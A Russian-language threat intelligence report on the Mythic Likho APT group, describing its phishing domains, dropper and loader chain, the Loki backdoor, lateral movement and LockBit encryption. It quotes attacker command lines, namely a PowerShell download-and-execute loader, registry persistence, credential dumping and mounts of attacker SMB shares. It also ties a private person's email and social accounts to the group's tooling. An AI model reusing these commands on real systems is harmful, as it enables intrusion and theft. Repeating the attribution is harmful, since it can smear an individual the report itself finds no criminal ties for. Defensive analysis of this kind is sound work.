Виктор Казаков
Ведущий специалист группы киберразведки TI-департамента экспертного центра безопасности Positive Technologies
Максим Шаманов
Младший специалист группы исследования сложных угроз TI-департамента экспертного центра безопасности Positive Technologies
Главные характеристики активности группировки Mythic Likho:
Первые кибератаки группировки Mythic Likho на российские организации с использованием бэкдора Loki были обнаружены в сентябре 2024 года. В феврале 2025 года тщательному исследованию подвергся загрузчик Merlin, в ноябре была описана новая версия бэкдора Loki.
В рамках данного исследования мы объединили экспертизу департаментов киберразведки (Threat Intelligence) и комплексного реагирования на киберугрозы (Incident Response) экспертного центра безопасности Positive Technologies (PT ESC), соединили разрозненные следы активности группировки Mythic Likho в единый кластер и провели его комплексное исследование. Наша цель — сформировать исчерпывающее понимание тактик, техник, средств нападения группировки.
Участники Mythic Likho тщательно изучают будущую жертву: сферу ее деятельности, географическое положение, контрагентов, адреса электронной почты сотрудников и их роли. Полученные данные используются для разработки вектора атаки, тематики фишинговых электронных писем, легенды и формата будущего общения с сотрудниками атакуемой организации, а также учитываются на этапе подготовки ресурсов.
Для размещения и хранения вредоносных инструментов, организации функционирования С2-инфраструктуры Mythic Likho:
Для отправки жертвам ссылок на вредоносные файлы группировка:
Группировка комбинирует получившуюся инфраструктуру: один из ее элементов располагается в скомпрометированном легитимном сетевом контуре, второй — мимикрирует под скомпрометированную организацию, облачное хранилище и универсальные сервисы, либо его стилизуют под сферу деятельности жертвы, выбранную тематику фишинговой рассылки и легенду общения с ее сотрудниками.
![Мимикрия под облачное хранилище: письмо с домена cloudmaill[.]ru и ссылка на загрузку HuLoader с домена ilcloud[.]ru](https://static.ptsecurity.com/uploads/files/Mimikriya_pod_oblachnoe_hranilishhe_7a18748190.png)
Учетные записи, используемые в переписке с жертвами, регистрируются с использованием российских мобильных номеров и оформляются как рабочие аккаунты сотрудников скомпрометированных организаций, от имени которых ведется общение: в профилях используются фавиконы взломанных официальных сайтов и реальные данные сотрудников.
Домены Mythic Likho можно разделить на несколько кластеров в зависимости от сферы атакуемой организации или используемой мимикрии. Все представленные в таблице домены классифицируются как фишинговые.
| Категория | Домены |
|---|---|
| Облачные хранилища | ilcloud[.]ru info-cloud[.]ru cloudmaill[.]ru cloudrc[.]ru |
| Промышленность | electropriborzavod[.]ru npo-iskra[.]ru gkrzn[.]ru |
| Государственные услуги | gosuslugi-help[.]ru gosinfobot[.]ru gosuslugi-moskva[.]ru моя-декларация[.]рф |
| Операторы связи | telecomz[.]ru nsitelecom[.]ru arctelecom[.]ru |
| Юридические услуги | yuristconsultant[.]ru consultantl[.]ru |
| Торговые сети | shopdns[.]ru dns-shop-client[.]ru |
| СМИ | vesti-news[.]ru |
| Программное обеспечение | winrar64[.]ru |
Непосредственно в кибератаках, как правило, используются субдомены третьего уровня, для которых также характерны мимикрия и сегментация:
| Категория | Субдомен |
|---|---|
| Облачные хранилища | drive disk files cloud document docs ftp |
| Электронная почта | mail pop3 pop smtp |
| Техническая поддержка | forum help |
| Тестовая инфраструктура | test |
| Поисковая система | yandex ya |
| API | api |
Имеются случаи повторной регистрации и использования доменов, ранее принадлежавших атакованным организациям.
Для С2-доменов, принимающих информацию о зараженном хосте и отдающих полезную нагрузку — бэкдор Loki, характерен одинаковый набор GET/POST конечных точек:
Все вредоносные домены Mythic Likho регистрирует в российском регистраторе Рег.ру, строго соблюдая гигиену анонимности серверной инфраструктуры и скрывая IP-адреса С2-серверов с использованием сервисов американского провайдера Cloudflare.
Исключением является инфраструктура домена ilcloud[.]ru, субдомены которого на момент использования в кибератаках были делегированы расположенным в Нидерландах серверам в сетях провайдеров Aeza International и SIA VEESP, а в конце января 2026 года были замечены на российском сервере 45.144.67[.]86 в сети провайдера FirstByte.
![DNS-инфраструктура домена ilcloud[.]ru](https://static.ptsecurity.com/uploads/files/DNS_infrastruktura_domena_ilcloud_ru_5c01452f4d.png)
Согласно сетевым отпечаткам, на обнаруженном сервере, возможно, установлен сканер уязвимостей Nessus, а также веб-сервер Traefik Proxy и Pangolin — выпущенная в январе 2025 года платформа для WireGuard-туннелирования сетевого трафика.
Обновление DNS-записей ранее обнаруженного С2-домена и наличие активного управляющего сервера с указанной конфигурацией и программным обеспечением указывают на активную подготовку Mythic Likho к проведению новых кибератак
В наступательный инструментарий Mythic Likho входят:
В качестве контейнеров для доставки загрузчиков и бэкдора подготавливаются ISO-файлы и RAR-архивы, содержащие SCR- либо LNK-загрузчики следующих стейджей, а также PDF- и JPG-приманки: поддельные официальные письма учреждений и организаций, договоры, товарные чеки, счета на оплату, фотографии, резюме. Для маскировки ВПО среди файлов-приманок используется двойное расширение и изменение иконок.
Подготовленные полезные нагрузки размещаются на взломанных легитимных сайтах, фишинговых доменах, в облачных хранилищах.
Mythic Likho запускает фишинговую рассылку на служебные адреса электронной почты сотрудников атакуемой организации. В письмах содержатся ссылки на вредоносные контейнеры. Непосредственно в теле письма вредоносные контейнеры в атаках группировки не встречались. Первое фишинговое письмо не всегда содержит вредоносную ссылку: ее присылают позже, после установления доверительных отношений с жертвой.
Если жертва уведомляет атакующих о том, что по каким-то причинам не может загрузить зловред по ссылке (например, из-за блокировки средствами антивирусной защиты), группировка в ходе дальнейшей переписки заманивает ее на другие вредоносные ресурсы.
Открытие файлов приводит к загрузке с С2-доменов и рефлексивному запуску в атакуемой системе загрузчиков HuLoader, Merlin или ReflectPulse, распаковывающих конечную полезную нагрузку — бэкдор Loki (подробный анализ вредоносных инструментов описан в разделе «Анализ инструментов»).
В самых ранних кибератаках Mythic Likho, наблюдавшихся в мае — июле 2024 года, для инициализации загрузчиков и бэкдоров использовались вложенные в RAR-архивы SCR-файлы. Впоследствии группировка отказалась от использования файлов этого типа в пользу LNK-загрузчиков, инициирующих скачивание следующих стейджей со взломанных легитимных сайтов либо вредоносных доменов.
Для всех обнаруженных LNK-загрузчиков характерно использование команд следующего вида:
/v:on /c "set u=https://192.168.1.1/[FILENAME] && set u=!u:192.168.1.1=[HACKED_OR_MALICIOUS_DOMAIN]! && powershell -c "$ProgressPreference='SilentlyContinue' ;iwr -Uri $env:u -OutFile $env:TEMP\[FILENAME];conhost.exe $env:TEMP\[FILENAME]"
Загрузчики Mythic Likho выделяются маскировкой IP-адресов в URL под локальные и их динамической заменой на реальные С2-домены из переменной окружения в итоговой PowerShell-команде в процессе ее выполнения. Для этого используется опция /v:on, активирующая механизм отложенного расширения переменных окружения. Данная техника позволяет избегать обнаружения средствами защиты, в которых отсутствует динамическая проверка файлов в виртуальной среде. В ряде кибератак локальный IP-адрес в теле LNK-команды дополнительно подвергался обфускации с использованием элементов экранирования.
При расследовании ряда инцидентов были обнаружены случаи первоначального доступа Mythic Likho в сеть атакуемой организации с использованием SSH-доступов, созданных группировкой (Ex)Cobalt, проникнувшей в инфраструктуру ранее.
Последующее закрепление также сопровождалось запуском загрузчика HuLoader, распаковкой бэкдора Loki и маскировкой его названий под легитимное программное обеспечение:
Дополнительно во избежание обнаружения Mythic Likho отключает на зараженном хосте средства антивирусной защиты.
Проникнув в сеть атакуемой организации, Mythic Likho обеспечивает автозапуск бэкдора Loki при каждом включении зараженного хоста, модифицируя ключ реестра Windows HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run командой reg add:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Yandex update service /t REG_SZ /d C:\\drivers\YandexUpdate.exe
Командами net user и net accounts на зараженном хосте создается новый локальный пользователь операционной системы, в папке .ssh создается файл ключа для обеспечения удаленного SSH-подключения.
С использованием общедоступных инструментов Ligolo-ng, PuTTY, Socat организуются сетевые туннели в скомпрометированную сеть. Можно ожидать, что в 2026 году в кибератаках злоумышленники будут использовать WireGuard-туннели для проброса сетевых портов зараженных устройств во внутренней сети скомпрометированной инфраструктуры до сетевых портов внешних управляющих Pangolin-серверов, мимикрирующих под российские легитимные сервисы.
Mythic Likho с использованием бэкдора Loki или защищенных ассиметричным шифрованием SFTP-подключений и сетевых туннелей загружает на зараженный хост из внешней сети дополнительный инструментарий:
Эти инструменты необходимы для реализации следующих стадий кибератаки.
Повышение привилегий (Privilege Escalation)
Получение учетных данных (Credential Access)
На зараженном хосте Mythic Likho использует утилиты Mimikatz и XenArmor Password Recovery Pro для извлечения из операционной и файловой систем данных учетных записей в том числе с привилегированными правами доступа.
Команды на запуск утилиты XenArmor Password Recovery Pro, обнаруженные в рамках расследования инцидентов:
xen.exe -a out.html
xen.exe -a C:\\drivers\\out.html
xen.exe -a i.html
C:\\drivers\\xen.exe -a i.html
C:\\drivers\\xen.exe -a i.html
XenAllPasswordPro.exe -a asd.html
C:\\drivers\\xen.exe -a i.html
C:\\drivers\\update\\XenAllPasswordPro.exe -a asd.html
C:\\drivers\\updates\\XenAllPasswordPro.exe -a C:\\Temp\\rep.html
С использованием бэкдора Loki, а также команд Windows и PowerShell группировка собирает информацию о зараженном хосте.
| Команда | Получаемые сведения |
|---|---|
| systeminfo | Информация о системе и конфигурации оборудования: версия операционной системы, ОЗУ, процессор и т. п. |
| Get-Process | Список процессов, запущенных в системе |
| Get-Volume | Информация о томах дисков: буквы, метки, файловые системы, размер и свободное место |
| Get-PSDrive | Список доступных PowerShell-дисков и их свойства |
| Команда | Получаемые сведения |
|---|---|
| whoami | Имя и домен текущего пользователя |
| Get-ADUser -Filter * | Пользователи Active Directory |
| net user | Пользователи Active Directory |
| net accounts | Параметры политики паролей и учетных записей Windows |
| Get-ADDefaultDomainPasswordPolicy | Политика паролей по умолчанию для указанного домена Active Directory |
| Get-WssPasswordPolicy | Политика паролей для Windows Server Essentials |
Для получения информации о пользователях Active Directory Mythic Likho также использует на зараженных хостах утилиту SharpHound.
| Команда | Получаемые сведения / действие |
|---|---|
| pwd | Полный путь текущего рабочего каталога |
| ls | Список файлов и каталогов в текущем каталоге |
| dir [PATH] | Список файлов и подкаталогов по указанному пути |
| tree [PATH] > [FILE_PATH] | Дерево каталогов по указанному пути и сохранение вывода в файл |
| -C "[Console]::OutputEncoding = New-Object System.Text.UTF8Encoding; (Get-ChildItem -Path '[PATH]' -Recurse | Measure-Object -Property Length -Sum | ForEach-Object {[math]::Round($_.Sum / 1MB, 2) })" | Рекурсивное перечисление файлов в указанной папке и подсчет их суммарного размера |
| (gci O:\1C_InfoBase (352) | measure Length -s).Sum / 1Mb | Суммарный размер всех файлов в каталоге базы «1С» в мегабайтах |
| Команда | Получаемые сведения |
|---|---|
| arp -a | ARP-таблица соответствия IP-адресов и MAC-адресов |
| netstat -atn | Статистика сетевых соединений |
| ipconfig | Конфигурация IP-адресов устройства |
| Get-SMBShare | Список доступных SMB-ресурсов |
| ping fs | Статус сетевой доступности хоста с именем fs с помощью ICMP‑эхо‑запросов |
| net view | Список хостов в текущем домене или рабочей группе, которые публикуют общие ресурсы |
Для изучения сетевого окружения группировка также запускает на зараженных хостах утилиту сетевого сканирования Nmap.
На этапе горизонтального перемещения внутри скомпрометированной инфраструктуры для выполнения удаленных команд на иных сетевых хостах Mythic Likho использует скомпрометированные локальные учетные записи и утилиты PsExec и DcomExec из набора инструментов Impacket.
Перемещение вредоносных инструментов внутри сети и их запуск осуществляется путем подключения командами net use и New-PSDrive локальных и удаленных SMB-хранилищ с загрузчиками HuLoader, Merlin и ReflectPulse.
Команды для подключения SMB-хранилищ, обнаруженные на зараженных хостах в рамках расследования инцидентов:
net use Z: \\5.255.116.34\doc.txt
net use Z: \\192.168.0.240\fs
net use X: \\87.251.66.8\test.jpg
New-PSDrive -Name Z -PSProvider FileSystem -Root \\192.168.0.240\fs -Persist
Mythic Likho с использованием нативных утилит создает локальные копии обнаруженных в скомпрометированной сети баз данных, с помощью PowerShell-команды Compress-Archive архивирует интересующие данные, обнаруженные в локальных и сетевых хранилищах зараженных хостов, далее с использованием утилиты Rclone либо бэкдора Loki выгружает их в облачные хранилища либо на С2-серверы соответственно.
На завершающей стадии кибератаки Mythic Likho зашифровывает информацию на устройствах в скомпрометированной сети шифровальщиком LockBit, форматирует RAID-массивы, удаляет утилиты создания и восстановления резервных копий, с использованием бэкдора Loki останавливает ряд служебных процессов. Дальнейшее руководство по общению в qTox и восстановлению доступа к зашифрованной информации группировка оставляет на зараженных хостах в русскоязычном сообщении в Notepad, характерном для официальных пользователей RaaS-сервиса LockBit.
Начиная с 2024 года группировка Mythic Likho использует в своих кибератаках несколько различных векторов доставки конечной полезной нагрузки, последовательно усложняя и совершенствуя их, что отражено на следующей схеме.
Из представленной схемы видно, что для группировки характерны обилие используемых дропперов и сложные цепочки поставки конечной полезной нагрузки. Кроме того, во всех наблюдаемых случаях прослеживается сохранение стабильной архитектуры дропперов при динамической замене самой полезной нагрузки.
С архитектурной точки зрения интерес представляют два элемента цепочки поставки:
Оба этих инструмента активно развиваются группировкой, тесно связаны с конечной полезной нагрузкой, имеют модульную структуру и универсальны.
Несмотря на то что этот дроппер используется Mythic Likho в качестве промежуточной стадии, его необычная структура и функциональность привлекли наше внимание. Нам удалось обнаружить несколько его версий — значит, инструмент регулярно обновляется и поддерживается.
Экземпляр, использованный группировкой в марте 2025 года, содержал в своих ресурсах бинарный блок данных, разделенный на две части: конфигурацию и основную полезную нагрузку. При запуске дроппер динамически разрешал адреса функций, используя модифицированный, регистронезависимый вариант алгоритма хеширования DJB2 с измененной константой.
Из конфигурационной части ресурса извлекались параметры HTTP-запроса: User-Agent, адрес и порт управляющего сервера, а также конечная точка и метод запроса. Используя эти данные, дроппер формировал и отправлял соответствующий запрос на C2-сервер, ожидая в ответ кодированный в Base64 ключ, который после декодирования применялся для извлечения полезной нагрузки: сначала выполнялось XOR-дешифрование основной полезной нагрузки, затем она распаковывалась с помощью DEFLATE.
Полученный блок данных далее интерпретировался как структурированный контейнер, описывающий следующий этап цепочки заражения. Этот контейнер содержал один исполняемый файл (дроппер № 2), сведения о месте его извлечения, параметры запуска, а также (при наличии) список дополнительных процессов, которые должны быть запущены с указанными аргументами.
В процессе работы дроппер извлекал PE-файл, определял путь его сохранения (либо используя полный путь, либо сохраняя его во временной директории, если было передано только имя), записывал файл на диск и запускал его с переданным аргументом.
Если структура ресурса содержала параметры запуска дополнительных процессов, то дроппер последовательно обрабатывал их, выполняя каждый с соответствующими аргументами. Подобная логика, вероятнее всего, используется для запуска документа-приманки, однако может применяться злоумышленниками и в иных целях. Важно отметить, что после каждого этапа дроппер очищал временные буферы, маскируя свою активность и затрудняя последующий анализ.
В модифицированной версии дроппера, использованной группировкой в ноябре 2025 года, обращение к C2-серверу исчезло — встроенный ресурс просто распаковывался без какой-либо расшифровки. Одновременно была расширена структура ресурса: дроппер получил возможность обрабатывать произвольное количество записей, каждая из которых содержит данные файла, путь его размещения в файловой системе и параметры запуска соответствующего процесса.
Дополнительно в обновленной версии дроппера была добавлена уникальная техника обфускации данных в куче, вызываемая несколько раз — до и после извлечения и распаковки ресурса. Данный механизм основан на создании массива из 50 000 указателей, для каждого из которых выделяется страница размером 4 КБ. Таким образом, за один вызов функции выделяется порядка 200 МБ памяти.
Примечательно, что на одной из страниц (с индексом 25 000) формируется фиктивный PE-подобный заголовок, включающий MZ- и PE-сигнатуры, служебные поля заголовка, а также детерминированный блок данных размером 1 КБ, имитирующий содержимое бинарного файла. Затем для каждой выделенной страницы принудительно обнуляется первый байт, после чего ее содержимое полностью перезаписывается значениями, вычисляемыми на основе ее индекса. В результате каждая страница полностью перезаписывается, включая ложный PE-заголовок.
Поскольку дроппер вызывает данную процедуру неоднократно, суммарный объем выделенной памяти может составлять до 1 ГБ. Такое массовое заполнение кучи выполняет сразу несколько функций: повышает энтропию памяти, затрудняет анализ дампов процесса и скрывает артефакты полезной нагрузки. В сочетании с переработанной структурой ресурса и отказом от сетевого взаимодействия с управляющим сервером это делает новую версию дроппера более устойчивой и скрытной.
Сохраненный на предыдущем шаге исполняемый файл представляет собой дроппер следующей стадии, предназначенный для извлечения и запуска загрузчика конечной полезной нагрузки. Аналогично предыдущему компоненту, он существует в нескольких версиях и содержит характерный для этой цепочки атак упакованный ресурс, позволяющий поддерживать несколько различных загрузчиков и их версий, используемых злоумышленниками.
Дроппер второй стадии наследует архитектурные принципы предыдущего: он также динамически разрешает адреса необходимых функций при помощи собственного варианта функции хеширования DJB2, распаковывает сохраненный в ресурсах контейнер и обрабатывает его.
Ключевое отличие этого этапа заключается в том, что после извлечения каждой записи дроппер определяет ее тип (EntryType) и, исходя из него, управляет процессом рефлективной загрузки следующей стадии.
| mainEntryType | additEntryType | Назначение |
|---|---|---|
| 4 | 2 | Первый и второй дополнительные блоки обрабатываются: первый интерпретируется как параметры подключения и передается загружаемой DLL в качестве аргумента вызываемой функции, а второй обрабатывается «пустыми» обработчиками, после чего полностью уничтожается |
| 3 | - | Все дополнительные секции игнорируются, загрузка выполняется без аргументов |
| 2 | - | Первый дополнительный блок интерпретируется как параметры подключения и передается загружаемой DLL в качестве аргумента |
| 1 | - | Первый дополнительный блок считывается, обрабатывается «пустыми» обработчиками, затем полностью уничтожается |
В ходе анализа были изучены несколько версий этого инструмента, что позволило проследить его эволюцию. При неизменном формате ресурсного блока разработчики Mythic Likho последовательно расширяют набор поддерживаемых типов записей и внедряют механизмы, усложняющие анализ. Одним из проявлений этих изменений стало появление описанной ранее техники обфускации данных в куче, отсутствовавшей в ранних версиях дроппера № 2. Кроме того, наличие «пустых» обработчиков указывает на создание основы для последующего расширения функциональности инструмента.
Рефлективно загружаемая DLL-библиотека выполняет роль агента-загрузчика, который собирает информацию о системе и передает ее на управляющий сервер, откуда в ответ получает конечную полезную нагрузку — бэкдор Loki. Для всех версий загрузчика характерны использование AES для шифрования сообщений и совместимость с такими фреймворками постэксплуатации, как Mythic и Havoc.
Структура формируемого сообщения может незначительно различаться в зависимости от версии инструмента, однако начиная со второй половины 2025 года остается неизменной и имеет следующие поля:
По аналогии с дропперами, начиная с 2024 года Mythic Likho активно использовали несколько вариантов загрузчиков, эволюцию которых нам также удалось проследить.
HuLoader — первый инструмент из данного семейства. Его ключевой особенностью является то, что, в отличие от последующих версий, он представляет собой самостоятельный исполняемый файл и поставлялся без использования дропперов.
Самая ранняя версия данного инструмента, обнаруженная в 2024 году, имела версию 0.0.2 и была единственной, которая не только собирала информацию о системе (формируя сообщение с тегом checkin), но и запрашивала команду для выполнения (используя тег get_tasking). В зависимости от полученной команды выполнялось одно из следующих действий:
Не менее примечательная особенность: именно в этой версии впервые появляется строка "Terminating Loki… Remember, I'll be back!", которая впоследствии будет перенесена в бэкдор Loki, загружаемый с управляющего сервера.
В дальнейших модификациях HuLoader группировка отказалась от встроенной системы команд, разделив загрузчик и бэкдор на два самостоятельных компонента, тем самым заложив основу для последующих кибератак.
Merlin — постэксплуатационный инструмент с открытым исходным кодом, написанный на языке Go, о котором было подробно рассказано в отчете наших коллег. Этот загрузчик сохраняет ключевые моменты, заложенные в HuLoader, — сбор фиксированной информации о системе и загрузку бэкдора.
В мае 2025 года Mythic Likho загружали агент Merlin уже с применением цепочки дропперов. Стоит отметить, что извлеченный ресурс имел тип 3 согласно таблице выше («загрузка без передачи параметров подключения в аргументе»).
ReflectPulse — инструмент, наиболее активно применявшийся группировкой Mythic Likho в большинстве атак, зафиксированных в 2025 году. За указанный период нами было проанализировано несколько версий этого инструмента, что позволило выявить ключевые изменения в его функциональности.
Версии загрузчика, использовавшиеся в период с марта по октябрь 2025 года, извлекались из ресурсов дроппера № 2 и при запуске получали от него в качестве аргумента параметры подключения: ключ шифрования, уникальный идентификатор агента, User-Agent, перечень конечных точек, а также зашифрованный с использованием AES адрес управляющего сервера. Передаваемый ключ использовался загрузчиком как для расшифрования строки конфигурации, содержащей адрес управляющего сервера, так и для шифрования и расшифрования сообщений при взаимодействии с этим сервером.
В ноябре того же года Mythic Likho впервые использовали обновленную версию ReflectPulse, существенно отличающуюся от предыдущих. Помимо конфигурации, дроппер № 2 также передавал в загрузчик локальную версию бэкдора Loki в открытом виде. Кроме того, была расширена структура конфигурации.
В ReflectPulse используется единый формат шифрования, который применяется как для обработки конфигурационных данных, так и для защиты сетевого взаимодействия с C2-сервером. Данные шифруются с использованием алгоритма AES в режиме CBC, а их целостность контролируется с помощью HMAC-SHA-256.
Формируемый шифртекст имеет составную структуру и включает инициализирующий вектор, зашифрованные данные и аутентификационный код. В обобщенном виде структура выглядит следующим образом:
Получив конфигурацию из дроппера № 2, загрузчик извлекает содержащиеся в ней параметры и, если модуль агента в ней был передан в открытом виде, шифрует его с использованием описанного выше формата и хранит до момента запуска исключительно в зашифрованном виде в памяти. После этого ReflectPulse инициирует взаимодействие с С2-сервером, используя значения интервалов опроса, извлеченные из конфигурации.
В случае отсутствия агента в конфигурации загрузчик передает собранные сведения о системе жертвы и ожидает получения зашифрованного модуля агента в ответном сообщении от С2-сервера. При наличии агента ReflectPulse также отправляет информацию о системе, однако в этом случае дожидается ответного сообщения, разрешающего расшифровку и запуск полезной нагрузки.
Метод передачи данных определяется жестко заданным в коде значением: ReflectPulse поддерживает как GET-, так и POST-запросы. В конфигурации для этого предусмотрены две отдельные конечные точки — по одной для каждого метода, а также параметр HTTP-запроса, предназначенный для передачи сформированных данных, отправляемых на С2-сервер.
Примечательно, что этот загрузчик поддерживает два режима работы, выбор между которыми определяется специальным флагом. В стандартном режиме конфигурационные данные хранятся и передаются в открытом виде. В режиме повышенной скрытности, напротив, конфигурационные параметры передаются и хранятся исключительно в зашифрованном виде. ReflectPulse сначала расшифровывает их, после чего переупаковывает: каждый параметр дополнительно перешифровывается с использованием операции XOR и индивидуального ключа, затрудняя анализ дампов памяти процесса.
Вне зависимости от способа доставки бэкдора, после получения ответа от С2-сервера в памяти процесса будет находиться зашифрованная полезная нагрузка. После ее расшифровки и успешной проверки аутентификационного кода агент выполняет рефлективную загрузку модуля и вызов его экспортируемой функции, передавая в качестве аргумента ранее извлеченные конфигурационные данные, а также адреса уже разрешенных функций, необходимых для дальнейшей работы.
В процессе инициализации Loki формирует стартовое сообщение, предназначенное для отправки на управляющий сервер. Это сообщение содержит фиксированное magic-значение 01 00 01 00 00 00 и шифруется с использованием того же алгоритма и ключа, что и в загрузчике. Способ передачи данных (GET или POST) также определяется жестко заданным в коде параметром и не зависит от содержимого конфигурации.
Получив ответ от управляющего сервера и успешно расшифровав его, бэкдор приступает к его обработке. Здесь следует отметить, что ответ C2-сервера может содержать более одной команды, — в этом случае каждая команда обрабатывается последовательно до их исчерпания.
Функциональность обновленного Loki не была изменена в сравнении с его первой версией, что было отмечено в разборе.
| Код команды | Назначение |
|---|---|
| 0 | Остановка работы бэкдора |
| 1 | Обновление интервала связи с сервером |
| 2 | Получение файла с управляющего сервера на целевую систему |
| 3 | Выгрузка файла с целевой системы на управляющий сервер |
| 4 | Запуск нового процесса |
| 5 | Загрузка и выполнение кода внутри выбранного процесса |
| 6 | Смена текущей рабочей директории |
| 7 | Принудительное завершение выбранного процесса |
| 8 | Выполнение Beacon Object File |
| 9 | Просмотр текущего каталога выполнения |
| 10 | Управление правами и токенами доступа Windows |
| 11 | Извлечение переменных окружения и их значений |
Результаты выполнения команд передаются на C2-сервер в виде структурированных сообщений. Для сообщений об успешном выполнении используется статус 0x04, тогда как при ошибках выполнения применяется значение 0x05. Помимо статуса, сообщения содержат фиксированное значение 0x01, предположительно используемое в качестве идентификатора версии бэкдора, а также код выполненной команды.
Опционально сообщение о выполненной команде может содержать дополнительные поля, в частности подтип выполненной команды, определяющий вариант ее обработки, внутренний код ошибки и значение LastError. Если команда выполнена успешно, к сообщению также добавляются данные, содержащие результат ее выполнения, если его передача предусмотрена.
Так как деятельность Mythic Likho направлена на вымогательство денег за расшифровку информации, жертвами группировки становятся крупные платежеспособные предприятия из таких секторов российской экономики, как:
В то же время организации, ресурсы которых были скомпрометированы и использованы группировкой для доставки вредоносных инструментов, относятся к сферам, универсальным с точки зрения легенд общения и мимикрии:
В ходе расследования инцидентов 2025 года команда PT ESC обнаружила, что на этапе закрепления в скомпрометированных сетях атакующие с использованием утилиты Chisel инициировали сетевой туннель до сервера 87.251.66[.]8, загружали на целевой хост руткит Megatsune из личного арсенала группировки (Ex)Cobalt, добавляли новых пользователей и SSH-ключи.
Спустя несколько дней SSH-ключи использовались для подключения и развития кибератак с применением загрузчиков HuLoader и ReflectPulse — компонентов личного инструментария группировки Mythic Likho.
Для дальнейшего перемещения внутри периметра скомпрометированной сети Mythic Likho подключали к зараженным хостам удаленное сетевое SMB-хранилище с указанными загрузчиками на том же сервере 87.251.66[.]8, который ранее использовался операторами Megatsune для Chisel-туннелирования.
Полагаем, что обнаруженные артефакты прямо указывают на связь группировок (Ex)Cobalt и Mythic Likho. Они совершают кибератаки в тандеме, дополняя инструментарий и техники друг друга, либо обмениваются личными вредоносными инструментами.
В рамках ретроспективного анализа скомпрометированных сетей команда PT ESC также обнаружила присутствие группировки XDSpy, однако ввиду значительной временной разницы между инцидентами в несколько месяцев оснований утверждать о связи группировок недостаточно.
В ходе расследования инцидентов, связанных с кибератаками Mythic Likho, команда PT ESC обнаружила, что на стадии сбора данных группировка использует экземпляр утилиты для восстановления паролей XenArmor Password Recovery устаревшей версии 2020 года с файлом бесплатной пробной лицензии, выпущенной для пользователя электронной почты onimaruslade@gmail[.]com.
Проведенное OSINT-расследование вывело команду киберразведки к зарегистрированным на указанный email аккаунтам в зарубежных социальных сетях. Аккаунты принадлежат жителю Канады, интересующемуся аниме и немецким футболом. Явные признаки его присутствия в киберпреступном андеграунде отсутствуют. В то же время в даркнете обнаружены следы компрометации доступа к его аккаунтам в зарубежных сервисах и социальных сетях вследствие утечек баз данных — в качестве пароля используется одно и то же простое кодовое слово.
![Аккаунты владельца onimaruslade@gmail[.]com: «ms» @onimaruslade зарегистрирован на указанный email, более старый «marc» @onislade является его подписчиком](https://static.ptsecurity.com/uploads/files/Akkaunty_vladelcza_216cfe57d3.png)
![Аккаунт владельца email onimaruslade@gmail[.]com](https://static.ptsecurity.com/uploads/files/Akkaunt_vladelcza_email_onimaruslade_gmail_com_1_ddf19d1266.png)
Однако озабоченность вызывают следующие факты:
Таким образом, обнаруженные артефакты указывают на два сценария развития активности:
Сложные кибератаки APT-группировки Mythic Likho в отношении российской критической информационной инфраструктуры регулярно фиксируются экспертами PT ESC на протяжении двух лет. Начиная с самых первых кибератак, группировка использует продуманную социальную инженерию, скомпрометированную легитимную инфраструктуру, вредоносный арсенал собственной разработки, последовательно совершенствуя и усложняя его.
Mythic Likho обладает высоким уровнем технического бэкграунда, дисциплины соблюдения анонимности вредоносной инфраструктуры, контактирует и сотрудничает с другими профессиональными АРТ-группировками, атакующими Россию. Вероятнее всего, члены группировки — представители профессионального киберпреступного андерграунда с внушительным опытом в проведении атак и достаточной материальной базой.
Экспертный центр безопасности Positive Technologies прогнозирует, что Mythiс Likho еще долгое время сохранит место в ландшафте киберугроз для критической инфраструктуры России. Эффективная защита от подобных устойчивых сложных угроз может быть обеспечена исключительно путем использования комплексных решений, сочетающих в себе ранее накопленную детектирующую экспертизу и актуальные данные киберразведки. TI-департамент PT ESC продолжит отслеживать активность группировки, своевременно предупреждать потенциальных жертв о готовящихся кибератаках и поставлять уникальные данные киберразведки пользователям продуктов Positive Technologies и портала PT Fusion.
В целях защиты от кибератак APT-группировки Mythic Likho рекомендуется:
| TOOLS [PTsecurity] Mythic C2 Loki Agent sid: 10013028 |
| TOOLS [PTsecurity] Possible Mythic sid: 10008802 |
| TOOLS [PTsecurity] Possible Mythic Framework via HTTP sid: 10008961 |
| LOADER [PTsecurity] HuLoader sid: 10011864 |